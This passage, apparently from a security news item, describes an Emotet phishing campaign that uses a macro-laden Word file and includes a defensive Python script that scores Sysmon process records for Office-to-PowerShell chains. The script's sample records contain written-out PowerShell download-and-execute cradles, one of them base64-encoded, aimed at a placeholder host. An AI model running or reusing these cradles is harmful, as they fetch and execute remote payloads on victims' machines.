Clicking the order button downloads a Word document named order_details.doc. When the file is opened, it prompts the user to click Enable Content in order to view it properly.
Once the user clicks the Enable Content button, the document's embedded macro runs a PowerShell command that downloads and executes the Emotet banking Trojan on the victim's computer.
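The chain above (macro-enabled document, Enable Content, PowerShell download cradle, dropped executable) is exactly what shows up in process-creation telemetry as an Office application spawning a script host with a suspicious command line. The script below is an added example written for this page, not EdgeWave's code and not anything recovered from the campaign: it scores constructed process-creation records (Sysmon Event ID 1 style fields ParentImage, Image, CommandLine), decodes -EncodedCommand payloads so the cradle hidden inside them can be matched, and flags the records that look like the Word-to-PowerShell chain. The hostnames, paths and command lines in the sample records are made up, and the scoring weights and threshold are assumptions to be tuned per environment.

```python
"""
Added example for this page (not EdgeWave's code, not from the campaign):
flag the delivery chain described above -- an Office document whose macro
launches PowerShell to fetch and run a payload -- in process-creation
telemetry.  Field names follow Sysmon Event ID 1 (ParentImage, Image,
CommandLine); the records, hostnames and paths below are constructed.
"""
import base64
import re
from dataclasses import dataclass

# Office applications that should almost never spawn a script host.
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}

# Script hosts commonly used as the macro's second stage.
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe",
                "cscript.exe", "mshta.exe"}

# Markers of a PowerShell download cradle; each hit adds to the score (weights assumed).
CRADLE_PATTERNS = [
    ("DownloadFile/DownloadString", re.compile(r"downloadfile|downloadstring", re.I)),
    ("web request cmdlet", re.compile(r"invoke-webrequest|\biwr\b|\bwget\b|\bcurl\b|start-bitstransfer", re.I)),
    ("Net.WebClient", re.compile(r"net\.webclient", re.I)),
    ("Invoke-Expression", re.compile(r"invoke-expression|\biex\b", re.I)),
    ("URL in command line", re.compile(r"https?://", re.I)),
    ("hidden window", re.compile(r"-w(?:indowstyle)?\s+hidden", re.I)),
    ("execution policy bypass", re.compile(r"-(?:ep|exec|executionpolicy)\s+bypass", re.I)),
]

# -e / -enc / -EncodedCommand followed by a base64 blob.
ENC_FLAG = re.compile(r"(?<!\w)-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.I)


@dataclass
class ProcessEvent:
    parent_image: str
    image: str
    command_line: str


def basename(path: str) -> str:
    """Lower-cased file name from a Windows path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def encode_command(script: str) -> str:
    """Build the -EncodedCommand form PowerShell expects: UTF-16LE, then base64."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(command_line: str):
    """Return the decoded script if the command line carries -EncodedCommand, else None."""
    m = ENC_FLAG.search(command_line)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyse(event: ProcessEvent):
    """Score one process-creation event; returns (score, reasons)."""
    parent, child = basename(event.parent_image), basename(event.image)
    score, reasons = 0, []
    if parent in OFFICE_PARENTS and child in SCRIPT_HOSTS:
        score += 50
        reasons.append(f"{parent} spawned {child}")
    text = event.command_line
    decoded = decode_encoded_command(text)
    if decoded is not None:
        score += 20
        reasons.append("encoded command decoded")
        # Replace the base64 blob with its plaintext so the cradle patterns see it.
        text = ENC_FLAG.sub(" ", text) + " " + decoded
    for label, pattern in CRADLE_PATTERNS:
        if pattern.search(text):
            score += 15
            reasons.append(label)
    return score, reasons


def triage(events, threshold: int = 60):
    """Return [(event, score, reasons)] for events at or above the threshold."""
    hits = []
    for ev in events:
        score, reasons = analyse(ev)
        if score >= threshold:
            hits.append((ev, score, reasons))
    return hits


WORD = r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE"
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"

# Constructed records: the first two mimic the macro-to-PowerShell chain, the rest are benign noise.
SAMPLE_EVENTS = [
    ProcessEvent(WORD, PS, "powershell.exe -nop -w hidden -e " + encode_command(
        "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/x')")),
    ProcessEvent(WORD, PS, r"""powershell.exe -nop -ep bypass -w hidden -c "(New-Object Net.WebClient).DownloadFile('http://example.invalid/order.exe','C:\Users\Public\order.exe'); Start-Process C:\Users\Public\order.exe" """),
    ProcessEvent(r"C:\Windows\explorer.exe", PS, "powershell.exe -NoProfile -c Get-ChildItem C:\\Users"),
    ProcessEvent(WORD, r"C:\Windows\splwow64.exe", "C:\\Windows\\splwow64.exe 12288"),
    ProcessEvent(r"C:\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE",
                 r"C:\Windows\System32\cmd.exe", "cmd.exe /c whoami"),
]

if __name__ == "__main__":
    for ev, score, reasons in triage(SAMPLE_EVENTS):
        print(score, basename(ev.parent_image), "->", ev.command_line[:60], reasons)
```

The parent/child pairing alone carries most of the weight because Word and Outlook have very few legitimate reasons to launch PowerShell or cmd.exe; the cradle patterns are scored on top so that an encoded or obfuscated command line still stands out once decoded. Lowering the threshold to 50 alerts on any Office-to-script-host spawn regardless of command line, which is the stricter policy many environments prefer.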
According to researchers at EdgeWave, the compromised servers used in this campaign are located in Colombia, Indonesia, and the United States.
“Interestingly, these other servers are in Houston and Lansing. Playing Dora the Explorer for a moment, we’ve encountered a compromised email server in Colombia sending phishing email with a link to a server in Indonesia that downloads malware which then contacts compromised servers in the United States. The holidays are truly global!”